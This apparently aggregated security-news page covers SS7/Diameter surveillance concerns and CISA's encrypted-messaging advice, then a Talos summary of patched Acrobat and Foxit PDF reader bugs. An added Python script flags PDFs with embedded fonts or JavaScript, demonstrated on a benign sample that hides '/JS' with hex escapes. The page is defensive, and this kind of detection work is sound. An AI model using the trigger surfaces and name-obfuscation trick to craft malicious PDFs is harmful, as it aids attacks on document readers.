DoD has begun limited pilots of a potentially more secure platform known as Matrix that is widely used by NATO allies, but the senators said the Defense Department needs to do more. 

The letter included a number of appendices detailing correspondence between Wyden’s staff and the DoD. 

In one, Wyden’s staff asked the DoD if it agreed with three statements by the Department of Homeland Security on SS7’s and Diameter’s security shortcomings that were included in a 2017 report – and the DoD responded that it agreed with the statements. 

The three DHS statements the DoD agreed with are: 

  • DHS “believes that all U.S. carriers are vulnerable to [SS7 and Diameter] exploits, resulting in risks to national security, the economy, and the Federal Government’s ability to reliably execute national essential functions.” 

  • DHS “believes SS7 and Diameter vulnerabilities can be exploited by criminals, terrorists, and nation-state actors/foreign intelligence organizations.” 

  • DHS “believes many organizations appear to be sharing or selling expertise and services that could be used to spy on Americans.” 

Wyden also said he had seen an unreleased CISA report from 2022 detailing U.S. telecom security issues that contained “alarming details about SS7-related surveillance activities involving U.S. telecommunications networks.” 

Wyden asked if DoD was “aware of any incidents in 2022 or 2023 in which DoD personnel, whether located in the U.S. or outside the U.S, were surveilled through SS7 and Diameter enabled technologies?” 

The DoD replied that the question “Requires a classified response.” 

Wyden sent the DoD a slide from a 2017 DHS event (not included in the documents) that identified the “primary countries reportedly using telecom assets of other nations to exploit U.S. subscribers. Those countries, according to the DHS presentation, are Russia, China, Israel and Iran.” 

Wyden said Russia, China, Israel and Iran had also used telecom assets of countries in Africa, Central and South America, Europe, and the Middle East to “attack US subscribers … indicating that these foreign governments are using SS7 to target U.S. users, and that these SS7 attack are being routed through 3rd country networks.” 

Asked if it agreed with those assessments, the DoD replied that it “is not in a position to render an assessment without access to the underlying data that informed this presentation.” 

CISA’s Encrypted Messaging Guidance 

With that background, CISA’s guidance issued this week merits particularly close attention from anyone engaged in sensitive communications, especially those who roam internationally, where the risk of being downgraded to SS7 is greatest. 

The CISA document includes specific recommendations for Android and iPhone devices, but general guidance includes: 

  • Use a free messaging application that provides end-to-end encryption, such as Signal or a similar app, for sensitive communications. 

  • Enable Fast Identity Online (FIDO) phishing-resistant authentication. 

  • Take inventory of valuable accounts, including email and social media, and review any accounts where information leakage would benefit threat actors. 

  • Enroll each account in FIDO-based authentication, especially Microsoft, Apple, and Google accounts. Once enrolled in FIDO-based authentication, disable other, less secure forms of MFA so they cannot be used as a fallback. 

  • For Gmail users, enroll in Google’s Advanced Protection Program (APP) to strengthen defenses against phishing and account hijacking. 

  • Migrate away from Short Message Service (SMS)-based MFA and disable SMS as a second factor for authentication, since SMS is exposed to the SS7 interception described above. 

  • Use a password manager to store all passwords. 

  • Set a telco PIN and MFA on mobile phone accounts to protect against SIM-swapping techniques. 

The post CISA Recommends Encrypted Messaging Apps as Telecom Security Questioned  appeared first on Cyble.


Acrobat out-of-bounds and Foxit use-after-free PDF reader vulnerabilities found


Cisco Talos’ Vulnerability Research team recently disclosed three out-of-bounds read vulnerabilities in Adobe Acrobat Reader and two use-after-free vulnerabilities in Foxit Reader. 

These vulnerabilities exist in Adobe Acrobat Reader and Foxit Reader, two of the most popular and feature-rich PDF readers on the market. 

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, in adherence to Cisco’s third-party vulnerability disclosure policy. Adobe patched the Acrobat Reader issues in version 24.005.20320, and Foxit’s fix appears in PDF Editor versions 12.1.9 and 11.2.12.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

Out-of-bounds read Adobe Acrobat Reader Vulnerabilities 

Discovered by KPC. 

Specially crafted font files embedded in a PDF can trigger out-of-bounds memory reads in TALOS-2024-2076 (CVE-2024-49534), TALOS-2024-2070 (CVE-2024-49533), and TALOS-2024-2064 (CVE-2024-49532), which could lead to the disclosure of sensitive information and further exploitation; out-of-bounds reads of this kind are typically used to leak memory contents that help an attacker chain a second bug into code execution. An attacker must trick the user into opening a malicious file to trigger these vulnerabilities. 

Foxit object use-after-free vulnerabilities 

Discovered by KPC. 

Two use-after-free vulnerabilities exist in the way Foxit Reader handles certain objects. TALOS-2024-2093 (CVE-2024-49576) and TALOS-2024-2094 (CVE-2024-47810) can be triggered by malicious JavaScript code in a PDF file. An attacker needs to either trick a user into opening the malicious file, or the user must navigate to a maliciously crafted website while the Foxit browser extension is enabled. These vulnerabilities can lead to memory corruption and result in arbitrary code execution. 
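Both advisories share the same two trigger surfaces: embedded font programs (the Acrobat out-of-bounds reads) and document JavaScript (the Foxit use-after-frees). The following added example, which is not Talos, Adobe or Foxit code, is a small static triage script that flags PDFs carrying either surface before they reach a reader, so that such files can be routed to a sandbox or a patched-only viewer. It scans for the relevant dictionary keys, inflates FlateDecode streams so keys hidden in compressed object streams are not missed, and undoes `#xx` hex escapes in names (a common evasion). The sample PDF is constructed inline and is not a real-world malicious file; the object-stream layout is simplified (no xref stream), since the scanner does not resolve object references. Hits are triage signals, not verdicts: most legitimate PDFs embed fonts, and JavaScript is a supported PDF feature.

```python
"""Static triage of a PDF for embedded font programs and document JavaScript.

Added example for the Talos advisories above; not vendor code.  Flags the
keys that pull a PDF reader into its font parser (/FontFile*) or its
JavaScript engine (/JS, /JavaScript, /OpenAction, /AA).
"""
import re
import zlib

FONT_KEYS = (b"/FontFile", b"/FontFile2", b"/FontFile3")
JS_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA")

# A stream body runs from the 'stream' keyword to the next 'endstream'.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)
FLATE_RE = re.compile(rb"/Filter\s*(?:\[\s*)?/FlateDecode")


def _inflate_streams(data: bytes) -> bytes:
    """Return the raw bytes plus the inflated body of every FlateDecode stream.

    Dictionaries stored in object streams (/Type /ObjStm) are compressed, so a
    scan of the raw file alone would miss the keys we care about.
    """
    parts = [data]
    for m in STREAM_RE.finditer(data):
        start = data.rfind(b" obj", 0, m.start())
        head = data[max(start, 0):m.start()]  # dictionary of this stream object
        if FLATE_RE.search(head):
            try:
                # decompressobj tolerates the newline that precedes 'endstream'.
                parts.append(zlib.decompressobj().decompress(m.group(1)))
            except zlib.error:
                pass  # corrupt stream: the raw bytes are still scanned
    return b"\n".join(parts)


def _normalize_names(text: bytes) -> bytes:
    """Undo #xx hex escapes in names so that /J#53 is seen as /JS."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), text)


def _name_re(key: bytes) -> re.Pattern:
    # A name ends at a delimiter; the lookahead keeps /FontFile from matching /FontFile2.
    return re.compile(re.escape(key) + rb"(?![0-9A-Za-z])")


def triage_pdf(data: bytes) -> dict:
    """Count embedded font programs and list the JavaScript-related keys found."""
    text = _normalize_names(_inflate_streams(data))
    fonts = sum(len(_name_re(k).findall(text)) for k in FONT_KEYS)
    js = sorted(k.decode() for k in JS_KEYS if _name_re(k).search(text))
    return {
        "embedded_fonts": fonts,
        "js_keys": js,
        "has_javascript": "/JS" in js or "/JavaScript" in js,
    }


def build_sample_pdf() -> bytes:
    """Constructed sample (not a real malicious file): one embedded TrueType
    font program plus an /OpenAction whose JavaScript action dictionary sits
    in a FlateDecode object stream with the /JS key hex-escaped.  The xref
    stream that would map object 7 into the object stream is omitted."""
    objstm_plain = b"7 0 << /Type /Action /S /JavaScript /J#53 (app.alert(1)) >>"
    objstm = zlib.compress(objstm_plain)
    objects = [
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 7 0 R >> endobj",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
        b"3 0 obj << /Type /Page /Parent 2 0 R /Resources << /Font << /F1 4 0 R >> >> >> endobj",
        b"4 0 obj << /Type /FontDescriptor /FontName /Example /FontFile2 6 0 R >> endobj",
        b"5 0 obj << /Type /ObjStm /N 1 /First 4 /Filter /FlateDecode /Length "
        + str(len(objstm)).encode() + b" >>\nstream\n" + objstm + b"\nendstream\nendobj",
        b"6 0 obj << /Length 4 >>\nstream\n\x00\x01\x00\x00\nendstream\nendobj",
    ]
    return b"%PDF-1.7\n" + b"\n".join(objects) + b"\ntrailer << /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    print(triage_pdf(build_sample_pdf()))
```

On the sample file a scan of the raw bytes would see only `/OpenAction`; the `/JavaScript` and `/JS` keys surface only after the object stream is inflated and the hex escape is normalized, which is why both steps belong in any PDF gate that is meant to catch the Foxit trigger. A file that reports `has_javascript` and a non-zero `embedded_fonts` count is a reasonable candidate to detonate in a sandbox rather than open on an unpatched endpoint.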

Cisco Talos Blog – Read More